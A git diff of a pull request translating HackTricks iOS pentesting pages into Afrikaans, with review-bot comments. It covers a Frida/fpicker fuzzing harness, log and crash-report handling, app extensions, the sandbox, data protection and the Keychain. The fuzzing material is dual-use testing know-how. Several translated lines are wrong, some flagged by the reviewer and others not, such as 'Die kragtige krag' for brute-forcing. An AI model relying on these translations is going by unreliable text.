fuzzing modes for in-process fuzzing, such as an AFL++ mode or a passive tracing mode. It should run on all platforms that are supported by Frida. - -* [**Install fpicker**](https://github.com/ttdennis/fpicker#requirements-and-installation) **& radamsa** +[**fpicker**](https://github.com/ttdennis/fpicker) is 'n **Frida-gebaseerde fuzzing suite** wat verskeie fuzzing modusse bied vir in-process fuzzing, soos 'n AFL++ modus of 'n passiewe spoorwegmodus. Dit behoort te werk op alle platforms wat deur Frida ondersteun word. +* [**Installeer fpicker**](https://github.com/ttdennis/fpicker#requirements-and-installation) **& radamsa** ```bash # Get fpicker git clone https://github.com/ttdennis/fpicker 
@@ -217,7 +248,7 @@ cd fpicker # Get Frida core devkit and prepare fpicker wget https://github.com/frida/frida/releases/download/16.1.4/frida-core-devkit-16.1.4-[yourOS]-[yourarchitecture].tar.xz -# e.g. https://github.com/frida/frida/releases/download/16.1.4/frida-core-devkit-16.1.4-macos-arm64.tar.xz +# e.g. https://github.com/frida/frida/releases/download/16.1.4/frida-core-devkit-16.1.4-macos-arm64.tar.xz tar -xf ./*tar.xz cp libfrida-core.a libfrida-core-[yourOS].a #libfrida-core-macos.a @@ -228,9 +259,7 @@ make fpicker-[yourOS] # fpicker-macos # Install radamsa (fuzzer generator) brew install radamsa ``` - -* **Prepare the FS:** - +* **Berei die FS voor:** ```bash # From inside fpicker clone mkdir -p examples/wg-log # Where the fuzzing script will be 
@@ -240,65 +269,64 @@ mkdir -p examples/wg-log/in # For starting inputs # Create at least 1 input for the fuzzer echo Hello World > examples/wg-log/in/0 ``` +* **Fuzzer-skrips** (`voorbeelde/wg-log/myfuzzer.js`): -* **Fuzzer script** (`examples/wg-log/myfuzzer.js`): - -{% code title="examples/wg-log/myfuzzer.js" %} +{% code title="voorbeelde/wg-log/myfuzzer.js" %} ```javascript // Import the fuzzer base class import { Fuzzer } from "../../harness/fuzzer.js"; class WGLogFuzzer extends Fuzzer { - constructor() { - console.log("WGLogFuzzer constructor called") +constructor() { +console.log("WGLogFuzzer constructor called") - // Get and declare the function we are going to fuzz - var wg_log_addr = Module.findExportByName("", ""); - var wg_log_func = new NativeFunction( - wg_log_addr, - "void", ["pointer", "pointer", "pointer"], { - }); +// Get and declare the function we are going to fuzz +var wg_log_addr = Module.findExportByName("", ""); +var wg_log_func = new NativeFunction( +wg_log_addr, +"void", ["pointer", "pointer", "pointer"], { +}); - // Initialize the object - super("", wg_log_addr, wg_log_func); - this.wg_log_addr = wg_log_addr; // We cannot use "this" before calling "super" - - console.log("WGLogFuzzer in the middle"); - - // Prepare the second argument to pass to the fuzz function - this.tag = Memory.allocUtf8String("arg2"); - - // Get the first argument we need to pass from a call to the functino we want to fuzz - var wg_log_global_ptr = null; - console.log(this.wg_log_addr); - Interceptor.attach(this.wg_log_addr, { - onEnter: function(args) { - console.log("Entering in the function to get the first argument"); - wg_log_global_ptr = new NativePointer(args[0]); - } - }); +// Initialize the object +super("", wg_log_addr, wg_log_func); +this.wg_log_addr = wg_log_addr; // We cannot use "this" before calling "super" - while (! 
wg_log_global_ptr) { - Thread.sleep(1) - } - this.wg_log_global_ptr = wg_log_global_ptr; - console.log("WGLogFuzzer prepare ended") - } +console.log("WGLogFuzzer in the middle"); + +// Prepare the second argument to pass to the fuzz function +this.tag = Memory.allocUtf8String("arg2"); + +// Get the first argument we need to pass from a call to the functino we want to fuzz +var wg_log_global_ptr = null; +console.log(this.wg_log_addr); +Interceptor.attach(this.wg_log_addr, { +onEnter: function(args) { +console.log("Entering in the function to get the first argument"); +wg_log_global_ptr = new NativePointer(args[0]); +} +}); + +while (! wg_log_global_ptr) { +Thread.sleep(1) +} +this.wg_log_global_ptr = wg_log_global_ptr; +console.log("WGLogFuzzer prepare ended") +} - // This function is called by the fuzzer with the first argument being a pointer into memory - // where the payload is stored and the second the length of the input. - fuzz(payload, len) { - // Get a pointer to payload being a valid C string (with a null byte at the end) - var payload_cstring = payload.readCString(len); - this.payload = Memory.allocUtf8String(payload_cstring); +// This function is called by the fuzzer with the first argument being a pointer into memory +// where the payload is stored and the second the length of the input. 
+fuzz(payload, len) { +// Get a pointer to payload being a valid C string (with a null byte at the end) +var payload_cstring = payload.readCString(len); +this.payload = Memory.allocUtf8String(payload_cstring); - // Debug and fuzz - this.debug_log(this.payload, len); - // Pass the 2 first arguments we know the function needs and finally the payload to fuzz - this.target_function(this.wg_log_global_ptr, this.tag, this.payload); - } +// Debug and fuzz +this.debug_log(this.payload, len); +// Pass the 2 first arguments we know the function needs and finally the payload to fuzz +this.target_function(this.wg_log_global_ptr, this.tag, this.payload); +} } const f = new WGLogFuzzer(); @@ -306,15 +334,13 @@ rpc.exports.fuzzer = f; ``` {% endcode %} -* **Compile** the fuzzer: - +* **Kompileer** die fuzzer: ```bash # From inside fpicker clone ## Compile from "myfuzzer.js" to "harness.js" frida-compile examples/wg-log/myfuzzer.js -o harness.js ``` - -* Call fuzzer **`fpicker`** using **`radamsa`**: +* Roep die fuzzer **`fpicker`** aan met behulp van **`radamsa`**: {% code overflow="wrap" %} ```bash 
@@ -325,67 +351,65 @@ fpicker -v --fuzzer-mode active -e attach -p -D usb -o example {% endcode %} {% hint style="danger" %} -In this case we **aren't restarting the app or restoring the state** after each payload. So, if Frida finds a **crash** the **next inputs** after that payload might also **crash the app** (because the app is in a unstable state) even if the **input shouldn't crash** the app. +In hierdie geval **herlaai ons die app nie of herstel die toestand nie** na elke lading. So, as Frida 'n **crash** vind, kan die **volgende insette** na daardie lading ook die app **crash** (omdat die app in 'n onstabiele toestand is), selfs al **moet die inset nie die app laat crash nie. -Moreover, Frida will hook into exception signals of iOS, so when **Frida finds a crash**, probably an **iOS crash reports won't be generated**. +Verder sal Frida in die uitsonderingseine van iOS inklink, so wanneer **Frida 'n crash vind**, sal daar waarskynlik nie 'n **iOS crash-rapport gegenereer word nie. -To prevent this, for example, we could restart the app after each Frida crash. +Om dit te voorkom, kan ons byvoorbeeld die app herlaai na elke Frida-crash. {% endhint %} -### Logs & Crashes +### Logboeke & Crashes -You can check the **macOS console** or the **`log`** cli to check macOS logs.\ -You can check also the logs from iOS using **`idevicesyslog`**.\ -Some logs will omit information adding **``**. To show all the info you need to install some profile from [https://developer.apple.com/bug-reporting/profiles-and-logs/](https://developer.apple.com/bug-reporting/profiles-and-logs/) to enable that private info. - -If you don't know what to do: +Jy kan die **macOS-konsole** of die **`log`**-opdrag gebruik om macOS-logboeke te kontroleer.\ +Jy kan ook die logboeke van iOS kontroleer deur **`idevicesyslog`** te gebruik.\ +Sommige logboeke sal inligting uitsluit deur **``** by te voeg. 
Om al die inligting te wys, moet jy 'n profiel installeer vanaf [https://developer.apple.com/bug-reporting/profiles-and-logs/](https://developer.apple.com/bug-reporting/profiles-and-logs/) om daardie private inligting in te skakel. +As jy nie weet wat om te doen nie: ```sh vim /Library/Preferences/Logging/com.apple.system.logging.plist - Enable-Private-Data - +Enable-Private-Data + killall -9 logd ``` - -You can check the crashes in: +Jy kan die crashes in die volgende plekke nagaan: * **iOS** - * Settings → Privacy → Analytics & Improvements → Analytics Data - * `/private/var/mobile/Library/Logs/CrashReporter/` +* Instellings → Privaatheid → Analitika & Verbeterings → Analitika Data +* `/private/var/mobile/Library/Logs/CrashReporter/` * **macOS**: - * `/Library/Logs/DiagnosticReports/` - * `~/Library/Logs/DiagnosticReports` +* `/Library/Logs/DiagnosticReports/` +* `~/Library/Logs/DiagnosticReports` {% hint style="warning" %} -iOS only stores 25 crashes of the same app, so you need to clean that or iOS will stop creating crashes. +iOS stoor slegs 25 crashes van dieselfde app, so jy moet dit skoonmaak of iOS sal ophou om crashes te skep. {% endhint %} -## Frida Android Tutorials +## Frida Android Tutoriale {% content-ref url="../android-app-pentesting/frida-tutorial/" %} [frida-tutorial](../android-app-pentesting/frida-tutorial/) {% endcontent-ref %} -## References +## Verwysings * [https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida](https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
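Review bot: the `## Frida Trace` hunk at the top of the frida-ios file replaces the heading with `+## Frida Spoor` and then adds two English paragraphs plus a nine-step list that have no counterpart in the removed lines, so this is new, untranslated content rather than a translation, and step 8 ships with empty placeholders (`frida -U -l -p` followed by "Replace `` with the path to your JavaScript code") that no reader can fill in; drop the added block, keep the section to the original heading and the `frida-trace` commands, and keep the heading as `## Frida Trace`, since it names the `frida-trace` tool rather than a word to translate. In the same file, `{% code title="voorbeelde/wg-log/myfuzzer.js" %}` translates a path that the bash steps still create and compile as `examples/wg-log/myfuzzer.js` (`mkdir -p examples/wg-log`, `frida-compile examples/wg-log/myfuzzer.js -o harness.js`), so the code title and the bullet text should stay `examples/wg-log/myfuzzer.js`. Finally, every JavaScript block in this file has its indentation stripped on the `+` lines (for example `+for (var className in ObjC.classes) {` replacing the indented `-` line); a translation PR should leave code bytes untouched, both for readability and so that later upstream diffs apply cleanly.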
diff --git a/mobile-pentesting/ios-pentesting/ios-app-extensions.md b/mobile-pentesting/ios-pentesting/ios-app-extensions.md index c4bee3166..3afbfce99 100644 --- a/mobile-pentesting/ios-pentesting/ios-app-extensions.md +++ b/mobile-pentesting/ios-pentesting/ios-app-extensions.md @@ -1,77 +1,77 @@ -# iOS App Extensions +# iOS App-uitbreidings
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-App extensions enhance the functionality of apps by allowing them to interact with other apps or the system, providing custom features or content. These extensions include: +App-uitbreidings verbeter die funksionaliteit van programme deur hulle in staat te stel om met ander programme of die stelsel te kommunikeer en aangepaste funksies of inhoud te bied. Hierdie uitbreidings sluit in: -- **Custom Keyboard**: Offers a unique keyboard across all apps, replacing the default iOS keyboard. -- **Share**: Enables sharing to social networks or with others directly. -- **Today (Widgets)**: Delivers content or performs tasks quickly from the Notification Center's Today view. +- **Aangepaste Sleutelbord**: Bied 'n unieke sleutelbord in alle programme, wat die verstek iOS-sleutelbord vervang. +- **Deel**: Maak dit moontlik om te deel na sosiale netwerke of direk met ander. +- **Vandag (Widgets)**: Lees inhoud of voer vinnige take uit vanuit die Vandag-aansig van die Kennisgewingsentrum. -When a user engages with these extensions, such as sharing text from a host app, the extension processes this input within its context, leveraging the shared information to perform its task, as detailed in Apple's documentation. +Wanneer 'n gebruiker met hierdie uitbreidings interaksie aangaan, soos om teks van 'n gasheerprogram te deel, verwerk die uitbreiding hierdie inset binne sy konteks en maak gebruik van die gedeelde inligting om sy taak uit te voer, soos beskryf in Apple se dokumentasie. -### **Security Considerations** +### **Sekuriteits-oorwegings** -Key security aspects include: +Belangrike sekuriteitsaspekte sluit in: -- Extensions and their containing apps communicate via inter-process communication, not directly. -- The **Today widget** is unique in that it can request its app to open via a specific method. -- Shared data access is allowed within a private container, but direct access is restricted. 
-- Certain APIs, including HealthKit, are off-limits to app extensions, which also cannot start long-running tasks, access the camera, or microphone, except for iMessage extensions. +- Uitbreidings en hul bevatte programme kommunikeer via interproseskommunikasie, nie direk nie. +- Die **Vandag-widget** is uniek in die sin dat dit sy program kan versoek om oop te maak deur middel van 'n spesifieke metode. +- Gedeelde data-toegang word toegelaat binne 'n private houer, maar direkte toegang is beperk. +- Sekere API's, insluitend HealthKit, is verbode vir app-uitbreidings, wat ook nie langdurige take kan begin nie, die kamera of mikrofoon kan gebruik nie, behalwe vir iMessage-uitbreidings nie. -### Static Analysis +### Statische Analise -#### **Identifying App Extensions** +#### **Identifisering van App-uitbreidings** -To find app extensions in source code, search for `NSExtensionPointIdentifier` in Xcode or inspect the app bundle for `.appex` files indicating extensions. Without source code, use grep or SSH to locate these identifiers within the app bundle. +Om app-uitbreidings in bronkode te vind, soek na `NSExtensionPointIdentifier` in Xcode of ondersoek die app-bundel vir `.appex`-lêers wat uitbreidings aandui. Sonder bronkode, gebruik grep of SSH om hierdie identifiseerders binne die app-bundel op te spoor. -#### **Supported Data Types** +#### **Ondersteunde Data Tipes** -Check the `Info.plist` file of an extension for `NSExtensionActivationRule` to identify supported data types. This setup ensures only compatible data types trigger the extension in host apps. +Kyk na die `Info.plist`-lêer van 'n uitbreiding vir `NSExtensionActivationRule` om ondersteunde data tipes te identifiseer. Hierdie opset verseker dat slegs verenigbare data tipes die uitbreiding in gasheerprogramme aktiveer. -#### **Data Sharing** +#### **Data Deling** -Data sharing between an app and its extension requires a shared container, set up via "App Groups" and accessed through `NSUserDefaults`. 
This shared space is necessary for background transfers initiated by extensions. +Data deling tussen 'n program en sy uitbreiding vereis 'n gedeelde houer wat opgestel word deur middel van "App Groups" en toegang verkry deur middel van `NSUserDefaults`. Hierdie gedeelde ruimte is noodsaaklik vir agtergrondoorplasings wat deur uitbreidings geïnisieer word. -#### **Restricting Extensions** +#### **Beperking van Uitbreidings** -Apps can restrict certain extension types, particularly custom keyboards, ensuring sensitive data handling aligns with security protocols. +Apps kan sekere uitbreidingstipes beperk, veral aangepaste sleutelborde, om te verseker dat die hantering van sensitiewe data ooreenstem met sekuriteitsprotokolle. -### Dynamic Analysis +### Dinamiese Analise -Dynamic analysis involves: +Dinamiese analise behels: -- **Inspecting Shared Items**: Hook into `NSExtensionContext - inputItems` to see shared data types and origins. -- **Identifying Extensions**: Discover which extensions process your data by observing internal mechanisms, like `NSXPCConnection`. +- **Ondersoek van Gedeelde Items**: Koppel aan `NSExtensionContext - inputItems` om gedeelde data tipes en oorsprong te sien. +- **Identifisering van Uitbreidings**: Ontdek watter uitbreidings jou data verwerk deur interne meganismes, soos `NSXPCConnection`, waar te neem. -Tools like `frida-trace` can aid in understanding the underlying processes, especially for those interested in the technical details of inter-process communication. +Hulpmiddels soos `frida-trace` kan help om die onderliggende prosesse te verstaan, veral vir diegene wat belangstel in die tegniese besonderhede van interproseskommunikasie. 
-## References +## Verwysings * [https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/](https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/) * [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0072/](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0072/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
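Review bot: in the ios-app-extensions.md hunk, `### Statische Analise` uses the Dutch form; the Afrikaans spelling is `### Statiese Analise`. In the extension list, `- **Vandag (Widgets)**: Lees inhoud of voer vinnige take uit` renders "Delivers content" as "reads content"; `Lewer inhoud` keeps the original meaning. In the security bullets, `Uitbreidings en hul bevatte programme` for "their containing apps" should be `hul bevattende programme` (the app that contains the extension, not one that is contained by it). The remaining lines of the hunk read consistently.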
diff --git a/mobile-pentesting/ios-pentesting/ios-basics.md b/mobile-pentesting/ios-pentesting/ios-basics.md index 6552be9b3..a050252ee 100644 --- a/mobile-pentesting/ios-pentesting/ios-basics.md +++ b/mobile-pentesting/ios-pentesting/ios-basics.md @@ -1,42 +1,39 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-# Privilege Separation and Sandbox +# Privilege Separation en Sandboks -In iOS, a distinction in privilege exists between the user-accessible applications and the system's core processes. Applications run under the **`mobile`** user identity, while the crucial system processes operate as **`root`**. This separation is enhanced by a sandbox mechanism, which imposes strict limitations on what actions applications can undertake. For instance, even if applications share the same user identity, they are prohibited from accessing or modifying each other's data. +In iOS bestaan daar 'n onderskeid in voorreg tussen die gebruikerstoeganklike programme en die kernprosesse van die stelsel. Programme loop onder die **`mobile`**-gebruikersidentiteit, terwyl die kritieke stelselprosesse as **`root`** werk. Hierdie skeiding word versterk deur 'n sandboks-meganisme wat streng beperkings plaas op die aksies wat programme kan onderneem. Byvoorbeeld, selfs al deel programme dieselfde gebruikersidentiteit, word hulle verbied om toegang tot of wysiging van mekaar se data te verkry. -Applications are installed in a specific directory (`private/var/mobile/Applications/{random ID}`) and have restricted read access to certain system areas and functionalities, such as SMS and phone calls. Access to protected areas triggers a pop-up request for user permission. +Programme word geïnstalleer in 'n spesifieke gids (`private/var/mobile/Applications/{willekeurige ID}`) en het beperkte leestoegang tot sekere stelselareas en -funksies, soos SMS'e en telefoonoproepe. Toegang tot beskermde areas veroorsaak 'n pop-upversoek vir gebruikerstoestemming. -# Data Protection +# Data Beskerming -iOS offers developers the **Data Protection APIs**, built atop the Secure Enclave Processor (SEP) — a dedicated coprocessor for cryptographic operations and key management. The SEP ensures data protection integrity via a unique device-specific key, the device UID, embedded within it. 
+iOS bied ontwikkelaars die **Data Protection APIs** aan, gebou op die Secure Enclave Processor (SEP) - 'n toegewyde koprotsessor vir kriptografiese operasies en sleutelbestuur. Die SEP verseker data-beskermingsintegriteit deur middel van 'n unieke toestelspesifieke sleutel, die toestel UID, wat daarin ingebed is. -Upon file creation, a unique 256-bit AES encryption key is generated, encrypting the file's content. This encryption key, alongside a class ID, is then encrypted using a class key and stored within the file's metadata. Decrypting a file involves using the system's key to access the metadata, retrieving the class key with the class ID, and then decrypting the file's unique encryption key. +By die skep van 'n lêer word 'n unieke 256-bit AES-kripteringssleutel gegenereer wat die inhoud van die lêer kripteer. Hierdie kripteringssleutel, tesame met 'n klas-ID, word dan gekripteer met behulp van 'n klasleutel en binne die lêer se metadata gestoor. Die ontkriptering van 'n lêer behels die gebruik van die stelsel se sleutel om toegang tot die metadata te verkry, die klasleutel met die klas-ID te herwin, en dan die unieke kripteringssleutel van die lêer te ontkripteer. -iOS defines **four protection classes** for data security, which determine when and how data can be accessed: +iOS definieer **vier beskermingsklasse** vir data-sekuriteit wat bepaal wanneer en hoe data toeganklik is: -- **Complete Protection (NSFileProtectionComplete)**: Data is inaccessible until the device is unlocked using the user's passcode. -- **Protected Unless Open (NSFileProtectionCompleteUnlessOpen)**: Allows file access even after the device is locked, provided the file was opened when the device was unlocked. -- **Protected Until First User Authentication (NSFileProtectionCompleteUntilFirstUserAuthentication)**: Data is accessible after the first user unlock post-boot, remaining accessible even if the device is locked again. 
-- **No Protection (NSFileProtectionNone)**: Data is only protected by the device UID, facilitating quick remote data wiping. +- **Volledige Beskerming (NSFileProtectionComplete)**: Data is ontoeganklik totdat die toestel ontgrendel word met die gebruiker se wagwoord. +- **Beskerm, tensy Oop (NSFileProtectionCompleteUnlessOpen)**: Maak lêertoegang moontlik selfs nadat die toestel gesluit is, op voorwaarde dat die lêer geopen is toe die toestel ontgrendel was. +- **Beskerm tot Eerste Gebruikersverifikasie (NSFileProtectionCompleteUntilFirstUserAuthentication)**: Data is toeganklik na die eerste gebruikersontsluiting na opstart, en bly toeganklik selfs as die toestel weer gesluit word. +- **Geen Beskerming (NSFileProtectionNone)**: Data word slegs beskerm deur die toestel UID, wat vinnige verwydering van data op afstand fasiliteer. -The encryption of all classes, except for `NSFileProtectionNone`, involves a key derived from both the device UID and the user's passcode, ensuring decryption is only possible on the device with the correct passcode. From iOS 7 onwards, the default protection class is "Protected Until First User Authentication". - -Developers can use [**FileDP**](https://github.com/abjurato/FileDp-Source), a tool for inspecting the data protection class of files on an iPhone. +Die kriptering van alle klasse, behalwe `NSFileProtectionNone`, behels 'n sleutel wat afgelei word van sowel die toestel UID as die gebruiker se wagwoord, om te verseker dat ontkriptering slegs moontlik is op die toestel met die korrekte wagwoord. Vanaf iOS 7 is die verstek beskermingsklas "Beskerm tot Eerste Gebruikersverifikasie". +Ontwikkelaars kan [**FileDP**](https://github.com/abjurato/FileDp-Source) gebruik, 'n instrument om die data-beskermingsklas van lêers op 'n iPhone te ondersoek. ```python # Example code to use FileDP for checking file protection class # Note: Ensure your device is jailbroken and has Python installed to use FileDP. 
@@ -45,105 +42,98 @@ git clone https://github.com/abjurato/FileDp-Source cd FileDp-Source python filedp.py /path/to/check ``` +## **Die Sleutelbos** -## **The Keychain** +In iOS dien 'n **Sleutelbos** as 'n veilige **versleutelde houer** vir die stoor van **sensitiewe inligting**, wat slegs toeganklik is deur die toepassing wat dit gestoor het of deur diegene wat uitdruklik gemagtig is. Hierdie versleuteling word versterk deur 'n unieke **wagwoord wat deur iOS gegenereer word**, wat self versleutel is met **AES**. Hierdie versleutelingsproses maak gebruik van 'n **PBKDF2-funksie**, wat die gebruiker se wagwoord kombineer met 'n sout wat afgelei is van die toestel se **UID**, 'n komponent wat slegs die **veilige enclave chipset** kan bereik. Gevolglik bly die inhoud van die Sleutelbos ontoeganklik op enige toestel anders as die een waar dit oorspronklik versleutel is, selfs as die gebruiker se wagwoord bekend is. -In iOS, a **Keychain** serves as a secure **encrypted container** for storing **sensitive information**, accessible only by the application that stored it or those explicitly authorized. This encryption is fortified by a unique **password generated by iOS**, which itself is encrypted with **AES**. This encryption process leverages a **PBKDF2 function**, combining the user's passcode with a salt derived from the device's **UID**, a component only the **secure enclave chipset** can access. Consequently, even if the user's passcode is known, the Keychain contents remain inaccessible on any device other than the one where they were originally encrypted. +**Bestuur en toegang** tot die Sleutelbosdata word hanteer deur die **`securityd` daemon**, gebaseer op spesifieke toepassingsbevoegdhede soos `Keychain-access-groups` en `application-identifier`. -**Management and access** to the Keychain data are handled by the **`securityd` daemon**, based on specific app entitlements like `Keychain-access-groups` and `application-identifier`. 
+### **Sleutelbos API-operasies** -### **Keychain API Operations** +Die Sleutelbos API, in detail beskryf in [Apple se Sleutelbosdiensdokumentasie](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/02concepts/concepts.html), bied essensiële funksies vir die bestuur van veilige stoor: -The Keychain API, detailed at [Apple's Keychain Services documentation](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/02concepts/concepts.html), provides essential functions for secure storage management: +- **`SecItemAdd`**: Voeg 'n nuwe item by die Sleutelbos. +- **`SecItemUpdate`**: Werk 'n bestaande item in die Sleutelbos by. +- **`SecItemCopyMatching`**: Haal 'n item uit die Sleutelbos op. +- **`SecItemDelete`**: Verwyder 'n item uit die Sleutelbos. -- **`SecItemAdd`**: Adds a new item to the Keychain. -- **`SecItemUpdate`**: Updates an existing item in the Keychain. -- **`SecItemCopyMatching`**: Retrieves an item from the Keychain. -- **`SecItemDelete`**: Removes an item from the Keychain. +Die kragtige krag van die Sleutelbos wagwoord behels óf die aanval op die versleutelde sleutel self of die poging om die wagwoord op die toestel self te raai, wat aansienlik bemoeilik word deur die veilige enclave se afdwinging van 'n vertraging tussen mislukte pogings. -Brute-forcing the Keychain password involves either attacking the encrypted key directly or attempting to guess the passcode on the device itself, hindered significantly by secure enclave's enforcement of a delay between failed attempts. +### **Konfigurering van Sleutelbositemdata-beskerming** -### **Configuring Keychain Item Data Protection** +Data-beskermingsvlakke vir Sleutelbositems word ingestel deur die `kSecAttrAccessible` eienskap tydens die skep of opdateer van 'n item. 
